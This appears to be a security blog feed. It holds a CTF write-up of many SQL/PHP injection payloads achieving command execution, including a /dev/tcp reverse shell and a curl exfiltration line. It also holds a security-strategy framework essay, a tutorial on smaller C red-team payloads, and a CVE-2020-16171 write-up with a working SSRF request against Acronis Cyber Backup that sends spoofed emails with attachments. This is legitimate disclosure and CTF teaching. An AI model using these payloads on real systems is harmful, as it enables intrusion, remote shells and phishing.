This solution is very similar to the author's, but instead of passthru, which prints the output directly, it uses exec and sends the result back to the solver's own server via curl. According to Mico, that's because "a hacker should always send something back to their own server XD".

Comment Everywhere

Almost every programming language has comment syntax that lets developers annotate code so the next person can quickly understand what it does. SQL and PHP naturally have their own comment syntax too, but the symbols they support differ slightly, and that small difference is exactly what helps us reach our goal.

by LJP (https://ljp-tw.github.io/blog/):

QueryString: column=id%0a-- /*%0a-- */ ; system('/readflag');%0a&id=1

SQL: SELECT id
     -- /*
     -- */ ; system('/readflag');
     FROM mytable WHERE id = '1'
PHP: $output = id
     -- /*
     -- */ ; system('/readflag');
     ;

This solution looks complicated but is conceptually simple: it exploits the fact that the two languages support different comment symbols. For SQL, -- is a comment marker that discards everything up to the end of the line, so every line starting with -- is invisible to SQL. For PHP, /* ... */ is a comment: everything between the opening /* and closing */ is invisible, and it may span multiple lines; -- in PHP is instead the decrement operator, so $output -- actually decrements $output by 1. Putting these together, only the third line as PHP sees it, ` ; system('/readflag');`, is treated as code to execute; everything else is regarded as comment text by either SQL or PHP and ignored, so the payload runs and retrieves the flag.

by ankleboy (https://www.facebook.com/profile.php?id=100001963625238):

QueryString: column=name%20/*!%20from%20mytable%20*/%20--%20;%20system(%22/readflag%22)&id=1

SQL: SELECT name /*! from mytable */ -- ; system("/readflag") FROM mytable WHERE id = '1'
PHP: $output = $row->name /*! from mytable */ -- ; system("/readflag");

This solution also uses comments, but with a slightly more exotic marker. Besides PHP, MySQL also supports the multi-line /* */ comment, but adding an exclamation mark, /*! */, changes things: this is a MySQL-specific comment variant in which the enclosed string is still executed by MySQL as part of the SQL statement, while other DBMSs see it start with /* and treat it as an ordinary comment, letting developers write portable code. We can thus craft comment text that MySQL sees but PHP does not, use it to force a valid SQL statement, close off the redundant SQL with --, and then write arbitrary PHP code right after the --.

by FI:

QueryString: column=id/*!from mytable union select `/readflag`*/./*!id from mytable*/`/readflag`%23?>&id=1

SQL: SELECT id/*!from mytable union select `/readflag`*/./*!id from mytable*/`/readflag`#?> FROM mytable WHERE id = '1'
PHP: $output = $row->id/*!from mytable union select `/readflag`*/./*!id from mytable*/`/readflag`#?>;

This one likewise uses the /*! */ comment to force a valid query. Interestingly, MySQL supports # as a single-line comment marker, which PHP also supports, so it doesn't break PHP syntax; finally, ?> is appended to forcibly end the PHP code block. Fun fact: if a statement is the last line inside a PHP code block, omitting the trailing ; does not cause a syntax error :P

by tree:

QueryString: column=null--+.$output=exec('/readflag')&id=

SQL: SELECT null-- .$output=exec('/readflag') FROM mytable WHERE id = '1'
PHP: $output = $row->null-- .$output=exec('/readflag');

This also uses -- to hide the PHP part from SQL, and the null keyword so the SQL query returns a result; in PHP, however, it becomes $row->null, accessing a property named null on the $row object, which is still valid PHP. Finally, the command execution result overwrites the $output variable, letting the challenge print the result for us.

by cebrusfs (https://www.facebook.com/menghuan.yu):

QueryString: column=NULL;%20--%20$b;var_dump(exec(%22/readflag%22))&id=1

SQL: SELECT column=NULL; -- $b;var_dump(exec("/readflag")) FROM mytable WHERE id = '1'
PHP: $output = $row->column=NULL; -- $b;var_dump(exec("/readflag"));

This solution follows a similar line of thought: use -- to close off the SQL, piece together valid PHP code, and finally force the output of exec with var_dump.

by Jason3e7 (https://github.com/jason3e7):

QueryString: column=NULL;-- $id %2b system('/readflag');%23&id=1

SQL: SELECT NULL;-- $id + system('/readflag');# FROM mytable WHERE id = '1'
PHP: $output = $row->NULL;-- $id + system('/readflag');#;

Again a similar idea. The interesting part is -- $id: everyone remembers that $id -- is the decrement operator, but it's easy to forget that -- $id is a decrement as well. So MySQL treats this -- as a comment, while PHP still treats it as a decrement operator and carries on executing.

by shoui:

QueryString: column=null-- -"1";"\$output = \$row->".system('/readflag').";";&id=1

SQL: SELECT null-- -"1";"\$output = \$row->".system('/readflag').";"; FROM mytable WHERE id = '1'
PHP: $output = $row->null-- -"1";"\$output = \$row->".system('/readflag').";";;

Same trick: -- closes off the SQL but is a decrement operator in PHP, and system prints the command output directly, so the flag comes right back. shoui added that during testing they simply copy-pasted the source line and tested against it, and later simplified the payload to ?id=1&column=null-- -"1";" ".system('/readflag').";" XD.

Double-quoted String Evaluation

PHP automatically scans double-quoted (") strings for words beginning with $, resolves them as variables, and interpolates their values into the string. This feature is great for quickly printing properly escaped variable values and improves code readability; but we can also use it for more interesting things. For example, the PHP code $str = "${phpinfo()}"; directly executes the phpinfo function, and $str = "${system('id')}"; executes a system command. In MySQL, double quotes also happen to denote plain strings, so we can construct a payload that MySQL sees as a harmless string but PHP sees as something to evaluate and execute.

Let's look at the first example:

by ginoah:

QueryString: column=id="${system('/readflag')}"&id=1

SQL: SELECT id="${system('/readflag')}" FROM mytable WHERE id = '1'
PHP: $output = $row->id="${system('/readflag')}";

To SQL, this simply returns the result of comparing id with a string; to PHP, the double-quoted string is evaluated first and then assigned to $row->id. As explained above, the evaluation executes the system command /readflag and prints the result to the page, so we get the flag!

by Billy (https://github.com/st424204):

QueryString: column=name%2b"{$_POST[1]($_POST[2])}"&id=1
POST: 1=system&2=/readflag

SQL: SELECT name+"{$_POST[1]($_POST[2])}" FROM mytable WHERE id = '1'
PHP: $output = $row->name+"{$_POST[1]($_POST[2])}";

This uses the same double-quote trick, but the construction is more elaborate and leans on some of PHP's loose typing features: if a string variable holds the name of an existing function, it can be called through that variable, as in $func = 'system'; $func('id');. This solution applies exactly that, using $_POST[1] from the request as the function name and $_POST[2] as its argument, so sending 1=system&2=/readflag retrieves the flag!

by Hans (https://hans00.me)

QueryString: column=id||"{$_POST['fn']($_POST['cmd'])}"&id=1
POST: fn=system&cmd=/readflag

SQL: SELECT id||"{$_POST['fn']($_POST['cmd'])}" FROM mytable WHERE id = '1'
PHP: $output = $row->id||"{$_POST['fn']($_POST['cmd'])}";

This example exploits the same feature as the previous one; the only difference is that the payload uses the logical OR operator || instead of the arithmetic addition operator +, with the same result.

by Chris Lin (https://github.com/kulisu)

QueryString: column=TRUE/"${system(%27/readflag%27)}";%23&id=1

SQL: SELECT TRUE/"${system('/readflag')}";# FROM mytable WHERE id = '1'
PHP: $output = $row->TRUE/"${system('/readflag')}";#;

Same concept again, this time with the division operator /. Only after reading the solution did we realize the submitter is a colleague!

Execution Operator

PHP has many functions for executing system commands, plus a special execution operator: wrapping a string in backticks (`) executes it as a system command, internally via shell_exec. Even more conveniently, this operator also supports double-quoted string evaluation, so with $cmd = 'id'; echo `$cmd`; PHP first resolves $cmd to id and then executes the id command. In MySQL, however, a backtick denotes an identifier, which refers to an object, most commonly a table or a column; in SELECT c FROM t, both c and t are identifiers. So to execute commands via the execution operator, we probably also need to make the identifier resolvable by MySQL.

by dalun (https://www.nisra.net):

QueryString: column=id=`$_POST[1]`%23?>&id=%0a+from+(select+'id','$_POST[1]')+as+a+--+
POST: 1=/readflag

SQL: SELECT id=`$_POST[1]`#?> FROM mytable WHERE id = '
     from (select 'id','$_POST[1]') as a -- '
PHP: $output = $row->id=`$_POST[1]`#?>;

This seems to be the only solution willing to use the id parameter XD! The column parameter uses the # comment marker to close off the trailing SQL, while the id parameter injects a newline and builds a valid SQL statement, using a subquery to fabricate a legitimate identifier; finally, PHP executes the system command via the execution operator.

by HexRabbit (https://twitter.com/h3xr4bb1t):

QueryString: column=name+or+@`bash+-c+"bash+-i+>%26+/dev/tcp/1.2.3.4/80+0>%261"`&id=1

SQL: SELECT name or @`bash -c "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"` FROM mytable WHERE id = '1'
PHP: $output = $row->name or @`bash -c "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"`;

The core of this solution is also command execution via the execution operator, but it uses a special character: @. In MySQL, @ denotes a user-defined variable, with the following string as the variable name; the name may contain special characters as long as it is wrapped in identifier backticks (`), and accessing an undefined variable is not an error, MySQL simply returns NULL. In PHP, @ is the error control operator: placed before an expression, it suppresses any error messages that expression produces, and since the execution operator is an expression, @ can precede it too. Finally, the solution chains everything with the or logical operator (supported with the same meaning in both MySQL and PHP) to achieve command execution.

by cjiso1117 (https://twitter.com/cjiso)

QueryString: column=$a%2b`curl 127.0.0.1/$(/readflag)`/*!from (select "asd" as "$a", "qwe" as "curl 127.0.0.1/$(/readflag)" ) as e*/;%23&id=qwe

SQL: SELECT $a+`curl 127.0.0.1/$(/readflag)`/*!from (select "asd" as "$a", "qwe" as "curl 127.0.0.1/$(/readflag)" ) as e*/;# FROM mytable WHERE id = 'qwe'
PHP: $output = $row->$a+`curl 127.0.0.1/$(/readflag)`/*!from (select "asd" as "$a", "qwe" as "curl 127.0.0.1/$(/readflag)" ) as e*/;#;

This again uses /*! */ to craft comment text that MySQL sees but PHP does not, controlling the query result, and finally executes the system command via the execution operator. Since MySQL treats backtick-quoted text as an identifier and errors out when no matching resource exists, the solution forcibly fabricates the identifier through a subquery with alias syntax so the query executes correctly. The submitter said they initially thought using /*! */ would look cool, but ended up taking a long detour.

by shik (https://github.com/ShikChen/)

QueryString: column=id%2b"${print_r(`/readflag`)}"&id=1

SQL: SELECT id+"${print_r(`/readflag`)}" FROM mytable WHERE id = '1'
PHP: $output = $row->id+"${print_r(`/readflag`)}";

This solution uses the addition operator to combine the id identifier with a double-quoted string, then exploits evaluation inside the double-quoted string to execute PHP code: the execution operator runs the system command and print_r forces the output, yielding the flag.

Anonymous:

QueryString: id=1&column=id%2b"${`yes`}"

SQL: SELECT id+"${`yes`}" FROM mytable WHERE id = '1'
PHP: $output = $row->id+"${`yes`}";

We also received an anonymous submission with the same idea as the previous ones, so we're including it here as well~

Closing Remarks

That wraps up our walkthrough of one of the open-ended challenges from the wargame we prepared for HITCON 2020, along with everyone's solutions. We hope you enjoyed it; if you did, remember to subscribe, like, share, and ring the little bell!

As a side note, we had 5 challenges worth 100 points each, which was the baseline for claiming a small prize, but we also prepared 3 bonus challenges worth only 1 point each (two web and a single pwn) for those wanting to test more advanced practical skills. The following two participants solved at least one bonus challenge:

  • 11/14 Balsn CTF 2020 總獎金十萬元: 502 points
  • FI: 501 points

A friendly plug: Balsn CTF 2020, organized by Balsn, one of Taiwan's well-known CTF teams, takes place on 11/14. They have prepared generous prize money and creative, highly technical challenges, so if you want to prove your skills, don't miss it!

Balsn Twitter: https://twitter.com/balsnctf/status/1316925652700889090
Balsn CTF 2020 on CTFtime: https://ctftime.org/event/1122/

Also, last but not least, congratulations to yuawn (https://twitter.com/_yuawn) for claiming last place in the DEVCORE Wargame with exactly 1 point, the only participant on the scoreboard with a score below 100! He also got the first blood (and the only solve) on the pwn challenge. Congrats 👏👏.

Finally, here are this year's top ten. See you in 2021~

Place  Team                               Score
1      11/14 Balsn CTF 2020 總獎金十萬元    502
2      FI                                 501
3      mico                               500
4      ankleboy                           500
5      hans00                             500
6      Meow                               500
7      ginoah                             500
8      cjiso1117                          500
9      zodiuss                            500
10     dalun                              500

Is Your Security Strategy Clear Enough? Using Frameworks to Prioritize Mitigating Real Threats

12 October 2020 at 16:00

Foreword

This is a topic Allen and I presented together at the iThome 2020 security conference. In Taiwan, security strategy is rarely discussed, mainly because the subject is dry and difficult, and from a business perspective it is hard to turn into a profitable service. The reason we wanted to share it is closely tied to our main service: red team assessments.

After running red team engagements for more than three years, helping enterprises uncover critical intrusion paths that threaten their operations and even exposing gaps in their defense mechanisms, many proactive customers wanted to know whether, beyond the issues found in a single red team exercise, there is a more thorough way to inventory the shortcomings of their current defenses. So we went looking for a structured, comprehensive way to explore this question and began thinking about the relationship between international standards, frameworks, and red teaming. Beyond finding an enterprise's problems through the attacker's mindset and techniques, we also hoped to help enterprises plan long-term, holistic defense from the defender's perspective.

Complex Problems Demand Strategic Thinking

Security is highly complex, finely divided work. Without identifying the core of a problem, you cannot clarify responsibilities or allocate resources, let alone reduce the chance of recurrence. Solving such a complex problem requires a security strategy to support it, not ad-hoc symptomatic fixes. First, we divide security defense into three stages:

  • Restorative: the enterprise invests most of its security resources in daily operations and troubleshooting, including identifying ongoing incidents, emergency handling, damage control, investigating and analyzing root causes, remediation, and devising countermeasures to prevent recurrence.
  • Preventive: resources are invested in the problems that would severely impact the enterprise, with continuous evaluation and drills for prevention and response, trying to identify causes ahead of time, prevent them, or prepare the countermeasures to execute when an incident occurs.
  • Aspirational/excellence-driven: inventory and analyze the strengths and weaknesses of the current posture, set goals for continuous improvement, and achieve them through action plans.

In our observation, the vast majority of enterprises fall into the "restorative" stage, yet most perceive themselves as "preventive". This perception gap mainly stems from not understanding their own security posture, which leads to misjudging how well risk is under control. A macro-level strategic review therefore helps inventory the gaps in the various controls, tighten the screws of the defense-in-depth mechanisms, and build the desired defense system.

Layered Responsibilities, Each Playing Its Part

We recommend examining defense in depth in a more holistic way, divided into four layers: the Executive Layer, Process Layer, Procedure Layer, and Technology Layer. A good defense strategy requires not only R & R (Role & Responsibility); more importantly, after strategy is set top-down, its effectiveness must be validated bottom-up, so security practitioners at each level have their own focal points:

  • Executive Layer: the CISO's perspective, focused on the risks that could affect the organization's operations and whether the resources to mitigate them are sufficient. Relevant references include NIST 800-39, NIST 800-30, ISO 27005, and CIS RAM.
  • Process Layer: senior management's perspective, focused on whether the management processes that keep the organization operating securely are adequate and enforced, and on planning the organization's future security maturity. References include the NIST Cybersecurity Framework and ISO 27001.
  • Procedure Layer: middle management's perspective, including deciding which security controls to implement and at what level of granularity. These items are the so-called security controls, e.g., configuration settings, password management, and the types of logs to record; see NIST 800-53 or the CIS Critical Security Controls.
  • Technology Layer: the perspective of junior managers and technical staff, covering the security appliances that counter attacker techniques, tools that automate security controls, monitoring and analysis tools, and so on. This is currently where most organizations focus their defense; you can map existing gaps against the MITRE ATT&CK techniques your appliances support, or position products with the OWASP Cyber Defense Matrix (CDM).

Positioning Frameworks and Standards

Having covered what each layer cares about, let's highlight a few important (or widely used) standards and frameworks. Beyond knowing which frameworks and standards relate to security, you also need to understand their applicable scenarios, their purposes, and the differences between them.

  • ISO 27001: belongs to the Process Layer. It provides a standard for establishing an information security management system (ISMS), helping organizations manage and protect information assets and meet the security expectations of customers and stakeholders; certification is available. One caveat: as a standard for practicing information security management, 27001 has the advantage of documented requirements, but most of its requirements address prevention and avoidance, with less emphasis on detecting and reacting to network threats.
  • NIST Cybersecurity Framework (CSF): belongs to the Process Layer. A US-led cybersecurity framework that helps critical infrastructure operators and general enterprises alike manage and protect information assets; it supports assessment and includes a maturity model, letting an enterprise describe its current security profile and strengthen it year by year through defined targets. It clearly structures the requirements into Identify, Protect, Detect, Respond, and Recover, and supports mapping to other standards and frameworks such as CIS CSC, COBIT, 27001, and NIST 800-53.

  • CIS Critical Security Controls (CSC): this control guideline belongs to the Procedure Layer. It prioritizes the controls to implement against network attacks; organizations can adopt the corresponding measures according to their size (Implementation Groups IG1-IG3). The controls are divided into Basic, Foundational, and Organizational groups, 20 control groups and 178 sub-controls in total.

Unhealthy Security Postures

In practice, enterprise defense strategies exhibit two unhealthy states:

  1. Insufficient defense in depth: defenses are not comprehensive (the red gap), appliances underperform their claims (the blue gap), or the appliances themselves have inherent limitations (the orange gap). Taken together, these issues prevent the appliances from working in concert to break the attack chain, creating a breach at the technology layer.
  2. Incomplete supporting measures: that is, gaps in procedures and processes. Suppose a security appliance can detect anomalous behavior: how do analysts distinguish an attack from normal internal employee activity? How quickly must they respond, and when should forensics be initiated? If these procedures and processes are not clearly defined, then even with effective appliances the organization will still be breached, because the response comes too slowly.

Inventorying the Coverage of Each Layer

So how do we improve these two poor defensive states? We can use the CDM alone to assess whether the technology layer's coverage is sufficient, or use it for a cross-layer inventory spanning procedures, processes, and technology.

The CDM (Cyber Defense Matrix) is an OWASP project consisting of a 5x5 matrix. The horizontal axis holds the five NIST CSF functions, and the vertical axis holds the asset classes commonly used in asset inventories. An organization can use this matrix to map the defensive appliances built at its Technology Layer and verify more precisely that the assets needing protection have corresponding measures in every NIST CSF function.

Take ISO 27001 as an example: map its main-body requirements and the Annex A controls onto the CDM to inventory the coverage ISO 27001 provides at the organization's process level. Note that different organizations will produce different mappings, which is precisely the value of reviewing through the CDM. For instance, when mapping "A.7.2.2 Information security awareness, education and training", the enterprise should consider whether personnel training covers all five NIST CSF functions or only awareness training; for the protections of "A.6.2.2 Teleworking", beyond network- and application-level protection, do the management procedures also cover the data and device requirements for teleworking?

Next, going one layer down (the Procedure Layer), map the enterprise's existing controls onto the CDM as well. Using CIS CSC as the example, the light blue parts are the Basic control groups and the gray parts are the Foundational control groups; the Organizational control groups lean toward the process side and are hard to pin to a single CDM cell.

Using Real Threats to Fill the Gaps in Security Strategy

After inventorying the Procedure and Process Layers with the CDM, the enterprise can then use services or tools that approximate real threats, such as security incidents, threat intelligence, red team exercises, or breach and attack simulation (BAS) tools, to reflect on the weaknesses of its security strategy. Here we use partial results from one of our red team engagements as a case study to tie this article together.

In this case, we can roughly identify several problems:

  1. Insecure coding practices: resulting in an arbitrary file upload vulnerability.
  2. Shared credentials across different systems: allowing credential stuffing to succeed, while monitoring and configuration management clearly failed to do their jobs.
  3. No network segmentation by data sensitivity: the Internet-facing segment could reach the core zone over RDP.
  4. No correlation analysis between privileged accounts and access control: allowing a backup account to log in to the AD domain controller.

The four items above are the omissions that intuitively come to mind during an inventory. But how do we confirm there are no other root causes the enterprise has not considered? This is where known standards and frameworks, combined with the previously inventoried controls, help us think more thoroughly about which controls could still be strengthened. If the enterprise's resources are limited, it can even follow the CIS CSC priority recommendations: first determine the organization's Implementation Group, then set short-, mid-, and long-term plans and allocate resources across the Basic, Foundational, and Organizational controls to improve defensive capability with clear goals.

Finally, map the Procedure Layer controls identified above to the Process Layer inventory and review the corresponding practices in the processes. Taking "14.1 Segment the network based on sensitivity" as an example, evaluate whether the ISO 27001 "A.6.2.2 Teleworking" requirements achieve proper network segmentation across devices, applications, networks, data, and users; or for "6.3 Enable detailed logging", evaluate whether ISO 27001 "A.16.1.5", on responding to information security incidents, is backed by corresponding procedures for detection, response, and recovery so that raised alerts are acted upon.

The methodology in this article spans technology, procedures, processes, and risk, giving security practitioners at different levels a consistent way to communicate. We hope a security strategy can be something an enterprise actually implements, with short-, mid-, and long-term goals, rather than just another lofty term in organizational governance.

Smaller C Payloads on Windows

25 September 2020 at 15:20

Introduction

Many thanks to 0xPat for his post on malware development, which is where the inspiration for this post came from.

When writing payloads for use in penetration tests or red team engagements, smaller is generally better. No matter the language you use, there is always a certain amount of overhead required for running a binary, and in the case of C, this is the C runtime library, or CRT. The C runtime is “a set of low-level routines used by a compiler to invoke some of the behaviors of a runtime environment, by inserting calls to the runtime library into compiled executable binary. The runtime environment implements the execution model, built-in functions, and other fundamental behaviors of a programming language”. On Windows, this means the various *crt.lib libraries that are linked against when you use C/C++. You might be familiar with the common compiler flags /MT and /MTd, which statically link the C runtime into the final binary. This is commonly done when you don’t want to rely on using the versioned Visual C++ runtime that ships with the version of Visual Studio you happen to be using, as the target machine may not have this exact version. In that case you would need to include the Visual C++ Redistributable or somehow have the end user install it. Clearly this is not an ideal situation for pentesters and red teamers. The alternative is to statically link the C runtime when you build your payload file, which works well and does not rely on preexisting redistributables, but unfortunately increases the size of the binary.

How can we get around this?

Introducing msvcrt.dll

msvcrt.dll is a copy of the C runtime which is included in every version of Windows from Windows 95 on. It is present even on a fresh install of Windows that does not have any additional Visual C++ redistributables installed. This makes it an ideal candidate to use for our payload. The trick is how to reference it. 0xPat points to a StackOverflow answer that describes this process in rather general terms, but without some tinkering it is not immediately obvious how to get it working. This post is aimed at saving others some time figuring this part out (shout out to AsaurusRex!).

Creating msvcrt.lib

The idea is to find all the functions that msvcrt.dll exports and add them to a library file so the linker can reference them. The process flow is to dump the exports into a file with dumpbin.exe, parse the results into .def format, which can then be converted into a library file with lib.exe. I have created a GitHub gist here that contains the commands to do this. I use Windows for dumping the exports and creating the .lib file, and Linux to do some text processing to create the .def file. I won't go over the steps in detail here as they are well commented in the gist.
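
Roughly, the flow looks like the following (illustrative file names; the exact text processing lives in the gist). The dumpbin and lib steps run from a Visual Studio developer command prompt:

dumpbin /exports C:\Windows\System32\msvcrt.dll > msvcrt_exports.txt

# (on Linux) massage the export names into a module definition file shaped like:
#   LIBRARY msvcrt.dll
#   EXPORTS
#       malloc
#       printf
#       ...

lib /def:msvcrt.def /out:msvcrt.lib /machine:x64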

Some Caveats

It is important to note that using msvcrt.dll is not a perfect replacement for the full C runtime. It will provide you with the C standard library functions, but not the full set of features that the runtime normally provides. This includes things like initializing everything before calling the usual main function, handling command line arguments, and probably a lot of other stuff I have not yet run into. So depending on how many features of the runtime you use, this may or may not be a problem. C++ will likely have more issues than pure C, as many C++ features involving classes and constructors are handled by the runtime, especially during program initialization.

Using msvcrt.lib

Using msvcrt.lib is fairly straightforward, as long as you know the proper compiler and linker incantations. The first step is to define _NO_CRT_STDIO_INLINE at the top of your source files. This presumably disables the inlined CRT stdio functions, though I've not seen it explicitly documented by Microsoft anywhere. I have noticed that this define alone is not enough. There are several compiler and linker flags that need to be set as well. I will list them here in the context of C/C++ Visual Studio project settings, as well as providing the command line argument equivalents.

Visual Studio Project Settings

  • Linker settings:
    • Advanced -> Entrypoint -> something other than main/wmain/WinMain etc.
    • Input -> Ignore All Default Libraries -> YES
    • Input -> Additional Dependencies -> add the custom msvcrt.lib path, kernel32.lib, any other libraries you may need, like ntdll.lib
  • Compiler settings:
    • Code Generation -> Runtime Library -> /MT
    • Code Generation -> /GS- (off)
    • Advanced -> Compile As -> /TC (only if you’re using C and not C++)
    • All Options -> Basic Runtime Checks -> Default

cl.exe Settings

cl.exe /MT /GS- /Tc myfile.c /link C:\path\to\msvcrt.lib "kernel32.lib" "ntdll.lib" /ENTRY:"YourEntrypointFunction" /NODEFAULTLIB

Some notes on these settings. You must have an entrypoint that is not named one of the standard Windows C/C++ function names, like main or WinMain. These are used by the C runtime, and as the full C runtime is not included, they cannot be used. Likewise, runtime buffer overflow checks (/GS) and other runtime checks are part of the C library and so not available to us.

If you plan on using command line arguments, you can still do so, but you'll need to use CommandLineToArgvW and link against Shell32.lib.
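
A minimal sketch of that, assuming a custom entrypoint named MyEntry (an illustrative name that must match your /ENTRY setting):

#include <windows.h>
#include <shellapi.h>   // CommandLineToArgvW; link against Shell32.lib

void MyEntry(void)
{
    int argc = 0;
    LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
    if (argv != NULL) {
        // argv[0] is the program path; argv[1..argc-1] are the arguments.
        LocalFree(argv);    // the array is allocated with LocalAlloc
    }
    ExitProcess(0);         // no CRT shutdown code runs, so exit explicitly
}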

Conclusion

Using this method I've seen a size reduction of 8x-12x in the resulting binary. I hope this post can serve as helpful documentation for others trying to get this working. Feel free to contact me if you have any issues or questions, and especially if you have any improvements or better ways of accomplishing this.

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00

You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

So Acronis Cyber Backup is essentially a backup solution that offers administrators a powerful way to automatically backup connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s essentially a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen:

Now, every hacker's goal is to find something unauthenticated. Something cool. So I started to dig into the source code of the main web service, and it didn't take me too long to discover something interesting in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The main interesting thing here is the call to get_ams_address(request.headers), which is used to construct a Uri. The application reads out a specific request header called Shard within that method:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When having a further look at the make_request_to_ams call, things are getting pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straight-forward SSRF including a couple of bonus points making the SSRF even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and the even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination Uri, since the API appends a colon, a port, and a resource to the requested Uri:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is also trivially easy to bypass, since you only need to append a ? so that everything after it is treated as the query string. A final payload for the Shard header, therefore, looks like the following:

Shard: localhost?
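
To see why the trailing ? works (illustrative values, using the unauthenticated resource discussed in the next section), the format call builds:

http://localhost?:9892/api/ams/agents

Everything after the ? is parsed as the query string, so the hardcoded port and resource no longer influence which host, port, and path urllib actually requests.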

Finding Unauthenticated Routes

To exploit this SSRF we need to find a route which is reachable without authentication. While most of CyberBackup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

This in turn only checks whether the allow_add_devices configuration is enabled (which is the default) before passing the request to the vulnerable _route_the_request_to_ams method:

               
def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we've found our attackable, unauthenticated route.

Sending Fully Customized Emails Including An Attachment

Apart from doing metadata stuff or similar, I wanted to fire the SSRF directly against one of Cyber Backup's internal web services. There are many of these, and a whole bunch of them have an authorization concept that relies solely on being callable from localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I'm not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is sent out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

This involves a variety of “customizations” for the email including a base64-encoded attachments value. Issuing this POST request returns null:

but ultimately sends out the email to the given mainRecipients including some attachments:

Perfectly spoofed mail, right ;-) ?

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While both values tenant_id and jwt are not explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/ which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
